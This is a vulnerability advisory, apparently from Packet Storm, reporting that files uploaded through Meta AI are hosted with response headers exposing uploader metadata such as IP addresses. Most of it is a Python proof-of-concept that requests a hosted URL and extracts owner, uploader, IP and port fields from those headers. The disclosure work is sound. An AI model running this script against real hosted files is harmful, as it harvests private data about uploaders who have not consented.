## https://sploitus.com/exploit?id=PACKETSTORM:222968
==================================================================================================================================
| # Title : Meta AI Disclosing sensitive metadata through hosting uploaded files |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.meta.ai/ |
==================================================================================================================================
[+] Summary : Publicly accessible files hosted through the upload workflow expose unsanitized object metadata in HTTP response headers.
The exposed metadata contains uploader-associated information including public IP addresses and additional internal object properties.
The issue allows anyone with access to the hosted URL to retrieve sensitive metadata without authentication.
[+] POC :
#!/usr/bin/env python3
import requests
import json
import argparse
from urllib.parse import urlparse
# Response headers printed for a hosted object: the x-manifold-obj-* entries
# carry object metadata, the first three are ordinary type/caching headers.
INTERESTING_HEADERS = [
    "content-type", "etag", "cache-control",
    "x-manifold-obj-blobsizebytes", "x-manifold-obj-canonicalpath",
    "x-manifold-obj-ctime", "x-manifold-obj-propertiesjson",
]
# Upper bound on how many characters of a text body are echoed as a preview.
MAX_PREVIEW = 5000
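# Keys pulled out of the parsed x-manifold-obj-propertiesjson header.
_METADATA_KEYS = (
    "file_name",
    "owner",
    "uploaded_by",
    "ip_address",
    "port_number",
    "X-Manifold-Obj-ContentType",
)

# Non-text/* media types whose body is still shown as a text preview.
_TEXT_TYPES = ("application/json", "application/xml")


def _print_interesting_headers(headers):
    """Print every header from INTERESTING_HEADERS that is present and non-empty."""
    print("\n=== Interesting Headers ===")
    for name in INTERESTING_HEADERS:
        value = headers.get(name)
        if value:
            print(f"{name}: {value}")


def _parse_properties(headers):
    """Return the x-manifold-obj-propertiesjson header decoded as a dict.

    Returns an empty dict when the header is absent, is not valid JSON, or
    decodes to something other than a JSON object. A parse failure is reported
    on stdout instead of being silently swallowed, so a changed header format
    does not look like "no metadata".
    """
    props = headers.get("x-manifold-obj-propertiesjson")
    if not props:
        return {}
    try:
        parsed = json.loads(props)
    except json.JSONDecodeError as e:
        print("[-] x-manifold-obj-propertiesjson is not valid JSON:", e)
        return {}
    if not isinstance(parsed, dict):
        # A JSON array or scalar would make `key in parsed` / `parsed[key]`
        # below either misbehave or raise TypeError.
        print("[-] x-manifold-obj-propertiesjson is not a JSON object, ignoring")
        return {}
    return parsed


def _print_metadata(parsed):
    """Print the _METADATA_KEYS entries found in *parsed*; print nothing if empty."""
    if not parsed:
        return
    print("\n=== Parsed Metadata ===")
    for key in _METADATA_KEYS:
        if key in parsed:
            print(f"{key}: {parsed[key]}")


def _content_type(headers):
    """Return the Content-Type media type, lower-cased and without parameters."""
    raw = headers.get("content-type", "")
    return raw.lower().split(";")[0].strip()


def _print_preview(response, content_type):
    """Print up to MAX_PREVIEW characters of a text-like body, else a notice."""
    if not (content_type.startswith("text/") or content_type in _TEXT_TYPES):
        print("[i] Non-text content, preview skipped")
        return
    print("\n=== File Content Preview ===")
    try:
        text = response.text
    except (UnicodeDecodeError, LookupError):
        # Unknown or undecodable charset: fall back to lossy UTF-8 decoding,
        # which cannot raise with errors="replace".
        text = response.content.decode("utf-8", errors="replace")
    if len(text) > MAX_PREVIEW:
        print(text[:MAX_PREVIEW])
        print(f"\n[truncated at {MAX_PREVIEW} chars]")
    else:
        print(text)


def analyze(url):
    """Fetch *url* and print the headers, metadata and body preview it returns.

    Prints the status and final host, the headers listed in
    INTERESTING_HEADERS, selected keys from the x-manifold-obj-propertiesjson
    header (when it parses as a JSON object), the detected content type and
    body size, and a preview of text-like bodies capped at MAX_PREVIEW
    characters.

    Args:
        url: The hosted object URL to request (GET, redirects followed,
            20 second timeout).

    Returns:
        None. A failed request is reported on stdout and ends the analysis
        early instead of raising.
    """
    print(f"\n[+] Target: {url}")
    try:
        r = requests.get(
            url,
            allow_redirects=True,
            timeout=20,
            headers={"User-Agent": "Metadata-Analyzer/3.0"},
        )
    except requests.RequestException as e:
        # Only transport/URL errors are expected here; anything else is a bug
        # and should surface rather than be masked as "Request failed".
        print("[-] Request failed:", e)
        return
    print("\n=== Response ===")
    print("Status :", r.status_code)
    print("Host :", urlparse(r.url).netloc)
    _print_interesting_headers(r.headers)
    _print_metadata(_parse_properties(r.headers))
    content_type = _content_type(r.headers)
    print("\n=== Content Analysis ===")
    print("Detected Content-Type:", content_type)
    print("Body Length:", len(r.content), "bytes")
    _print_preview(r, content_type)
    print("\n[+] Done")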
def main():
    """Parse the single positional URL argument and hand it to analyze()."""
    cli = argparse.ArgumentParser()
    cli.add_argument("url", help="CDN object URL")
    options = cli.parse_args()
    analyze(options.url)
if __name__ == "__main__":
    # Script entry point; main() returns None, so the process exits with status 0.
    raise SystemExit(main())
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================